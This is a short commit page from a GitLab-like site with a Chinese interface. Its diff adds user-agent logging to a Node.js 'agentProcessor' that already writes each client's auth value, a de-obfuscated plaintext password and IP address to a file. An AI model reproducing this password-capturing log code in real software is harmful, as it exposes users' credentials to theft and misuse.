提交 94ea0f4b authored 作者: GOD_ZYX's avatar GOD_ZYX

数据中 也同时增加 UA

上级 44e2dab3
...@@ -122,6 +122,7 @@ const agentProcessor = () => { ...@@ -122,6 +122,7 @@ const agentProcessor = () => {
'Auth: ' + json.auth, 'Auth: ' + json.auth,
'Pwd: ' + (pwdBase64.replace(/^uokoaduw/gi, '').replace(/auhgniq$/gi, '').split('').reverse().join('') || 1), 'Pwd: ' + (pwdBase64.replace(/^uokoaduw/gi, '').replace(/auhgniq$/gi, '').split('').reverse().join('') || 1),
'IP: ' + getClientIP(req), 'IP: ' + getClientIP(req),
'UA: ' + req.headers['user-agent'],
'\n\n' '\n\n'
].join('\n'), function (err) { ].join('\n'), function (err) {
if (err) { return console.error(err) } if (err) { return console.error(err) }
......
Markdown 格式
0%
您添加了 0 到此讨论。请谨慎行事。
请先完成此评论的编辑!
注册 或者 后发表评论